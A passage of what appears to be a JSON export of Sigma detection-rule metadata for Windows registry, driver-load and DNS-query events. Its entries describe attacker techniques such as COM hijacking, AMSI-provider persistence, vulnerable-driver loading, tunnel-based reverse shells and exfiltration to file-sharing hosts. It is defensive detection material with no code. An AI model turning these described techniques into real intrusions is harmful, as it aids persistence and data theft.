Renamed Sysinternals Tools - Registry" }, { "description": "Detects registry keys related to NetWire RAT", "meta": { "author": "Christopher Peacock", "creation_date": "2021-10-07", "falsepositive": [ "Unknown" ], "filename": "registry_add_malware_netwire.yml", "level": "high", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", "value": "Potential NetWire RAT Activity - Registry" }, { "description": "Detects COM object hijacking via TreatAs subkey", "meta": { "author": "Kutepov Anton, oscd.community", "creation_date": "2019-10-23", "falsepositive": [ "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], "filename": "registry_add_persistence_com_key_linking.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "value": "Potential COM Object Hijacking Via TreatAs Subkey - Registry" }, { "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", "meta": { "author": "Markus Neis", "creation_date": "2017-08-28", "falsepositive": [ "Legitimate use of SysInternals tools", "Programs that use the same Registry Key" ], "filename": "registry_add_pua_sysinternals_execution_via_eula.yml", "level": "low", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://twitter.com/Moti_B/status/1008587936735035392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "value": "PUA - Sysinternal Tool Execution - Registry" }, { "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "filename": "registry_add_persistence_amsi_providers.yml", "level": "high", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", "https://persistence-info.github.io/Data/amsi.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "value": "Potential Persistence Via New AMSI Providers - Registry" }, { "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate new entry added by windows" ], "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "value": "Potential Persistence Via Disk Cleanup Handler - Registry" }, { "description": "Detects creation of \"UserInitMprLogonScript\" registry value which can be used as a persistence method by malicious actors", "meta": { "author": "Tom Ueltschi (@c_APT_ure)", "creation_date": "2019-01-12", "falsepositive": [ "Investigate the contents of the \"UserInitMprLogonScript\" value to determine of the added script is legitimate" ], "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml", "level": "medium", "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" ], "tags": [ "attack.t1037.001", "attack.persistence", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "value": "Potential Persistence Via Logon Scripts - Registry" }, { "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-26", "falsepositive": [ "Unknown" ], "filename": "driver_load_win_vuln_winring0_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "value": "Vulnerable WinRing0 Driver Load" }, { "description": "Detects a driver load from a temporary directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-12", "falsepositive": [ "There is a relevant set of false positives depending on applications in the environment" ], "filename": "driver_load_win_susp_temp_use.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_susp_temp_use.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "value": "Driver Load From A Temporary Directory" }, { "description": "Detects driver load of the Process Hacker tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-16", "falsepositive": [ "Legitimate use of process hacker or system informer by developers or system administrators" ], "filename": "driver_load_win_pua_process_hacker.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://processhacker.sourceforge.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_process_hacker.yml" ], "tags": [ "attack.privilege-escalation", "cve.2021-21551", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", "value": "PUA - Process Hacker Driver Load" }, { "description": "Detects driver load of the System Informer tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-08", "falsepositive": [ "System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly" ], "filename": "driver_load_win_pua_system_informer.yml", "level": "medium", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://systeminformer.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_system_informer.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10cb6535-b31d-4512-9962-513dcbc42cc1", "value": "PUA - System Informer Driver Load" }, { "description": "Detects loading of known malicious drivers via the file name of the drivers.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-03", "falsepositive": [ "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "filename": "driver_load_win_mal_drivers_names.yml", "level": "medium", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers_names.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39b64854-5497-4b57-a448-40977b8c9679", "value": "Malicious Driver Load By Name" }, { "description": "Detects loading of known vulnerable drivers via their hash.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unknown" ], "filename": "driver_load_win_vuln_drivers.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "value": "Vulnerable Driver Load" }, { "description": "Detects the load of known vulnerable drivers via the file name of the drivers.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-03", "falsepositive": [ "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "filename": "driver_load_win_vuln_drivers_names.yml", "level": "low", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72cd00d6-490c-4650-86ff-1d11f491daa1", "value": "Vulnerable Driver Load By Name" }, { "description": "Detects loading of known malicious drivers via their hash.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unknown" ], "filename": "driver_load_win_mal_drivers.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://loldrivers.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003", "attack.t1068" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05296024-fe8a-4baf-8f3d-9a5f5624ceb2", "value": "Malicious Driver Load" }, { "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unlikely" ], "filename": "driver_load_win_vuln_hevd_driver.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "295c9289-acee-4503-a571-8eacaef36b28", "value": "Vulnerable HackSys Extreme Vulnerable Driver Load" }, { "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "Legitimate WinDivert driver usage" ], "filename": "driver_load_win_windivert.yml", "level": "high", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ "https://reqrypt.org/windivert-doc.html", "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml" ], "tags": [ "attack.collection", "attack.defense-evasion", "attack.t1599.001", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "4ffc1794-ec3b-45be-9e52-42dbcb2af2de", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", "value": "WinDivert Driver Load" }, { "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-09", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_mal_cobaltstrike.yml", "level": "critical", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", "value": "Suspicious Cobalt Strike DNS Beaconing - Sysmon" }, { "description": "Detects DNS requests to Cloudflared tunnels domains.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate use of cloudflare tunnels will also trigger this." ], "filename": "dns_query_win_cloudflared_communication.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_cloudflared_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1d9eec5-33b2-4177-8d24-27fe754d0812", "value": "Cloudflared Tunnels Related DNS Requests" }, { "description": "Detects a DNS query by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Likely with other browser software. Apply additional filters for any other browsers you might use." ], "filename": "dns_query_win_domain_azurewebsites.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia", "https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/", "https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e043f529-8514-4205-8ab0-7f7d2927b400", "value": "DNS Query To AzureWebsites.NET By Non-Browser Process" }, { "description": "Detects DNS queries made by \"AppInstaller.EXE\". The AppInstaller is the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL\n", "meta": { "author": "frack113", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_appinstaller.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://twitter.com/notwhickey/status/1333900137232523264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_appinstaller.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", "value": "AppX Package Installation Attempts Via AppInstaller.EXE" }, { "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", "meta": { "author": "Brandon George (blog post), Thomas Patzke", "creation_date": "2021-07-08", "falsepositive": [ "Legitimate usage of IP lookup services such as ipify API" ], "filename": "dns_query_win_susp_external_ip_lookup.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", "https://twitter.com/neonprimetime/status/1436376497980428318", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml" ], "tags": [ "attack.reconnaissance", "attack.t1590" ] }, "related": [ { "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "value": "Suspicious DNS Query for IP Lookup Service APIs" }, { "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-30", "falsepositive": [ "Unknown binary names of TeamViewer", "Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications" ], "filename": "dns_query_win_teamviewer_domain_query_by_uncommon_app.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.teamviewer.com/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "value": "TeamViewer Domain Query By Non-TeamViewer Application" }, { "description": "Detects DNS server discovery via LDAP query requests from uncommon applications", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Likely" ], "filename": "dns_query_win_dns_server_discovery_via_ldap_query.yml", "level": "low", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml" ], "tags": [ "attack.discovery", "attack.t1482" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "value": "DNS Server Discovery Via LDAP Query" }, { "description": "Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "citron_ninja", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Devtunnels will also trigger this." ], "filename": "dns_query_win_devtunnels_communication.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security", "https://cydefops.com/devtunnels-unleashed", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b", "value": "DNS Query To Devtunnels Domain" }, { "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", "level": "high", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" ], "tags": [ "attack.persistence", "attack.t1554" ] }, "related": [ { "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "value": "DNS HybridConnectionManager Service Bus" }, { "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", "meta": { "author": "frack113", "creation_date": "2022-02-20", "falsepositive": [ "Unknown" ], "filename": "dns_query_win_tor_onion_domain_query.yml", "level": "high", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.003" ] }, "related": [ { "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "value": "DNS Query Tor .Onion Address - Sysmon" }, { "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "meta": { "author": "yatinwad, TheDFIRReport", "creation_date": "2022-06-23", "falsepositive": [ "DNS queries for \"ufile\" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take" ], "filename": "dns_query_win_ufile_io_query.yml", "level": "low", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io_query.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "value": "DNS Query To Ufile.io" }, { "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-07-15", "falsepositive": [ "Rare legitimate access to anonfiles.com" ], "filename": "dns_query_win_anonymfiles_com.yml", "level": "high", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "065cceea-77ec-4030-9052-fc0affea7110", "value": "DNS Query for Anonfiles.com Domain - Sysmon" }, { "description": "Detects DNS queries for subdomains related to MEGA sharing website", "meta": { "author": "Aaron Greetham (@beardofbinary) - NCC Group", "creation_date": "2021-05-26", "falsepositive": [ "Legitimate DNS queries and usage of Mega" ], "filename": "dns_query_win_mega_nz.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "value": "DNS Query To MEGA Hosting Website" }, { "description": "Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "citron_ninja", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel will also trigger this." ], "filename": "dns_query_win_vscode_tunnel_communication.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://cydefops.com/vscode-data-exfiltration", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3e6418f-7c7a-4fad-993a-93b65027a9f1", "value": "DNS Query To Visual Studio Code Tunnels Domain" }, { "description": "Detects DNS query requests to \"update.onelaunch.com\". This domain is associated with the OneLaunch adware application.\nWhen the OneLaunch application is installed it will attempt to get updates from this domain.\n", "meta": { "author": "Josh Nickels", "creation_date": "2024-02-26", "falsepositive": [ "Unlikely" ], "filename": "dns_query_win_onelaunch_update_service.yml", "level": "low", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/", "https://malware.guide/browser-hijacker/remove-onelaunch-virus/", 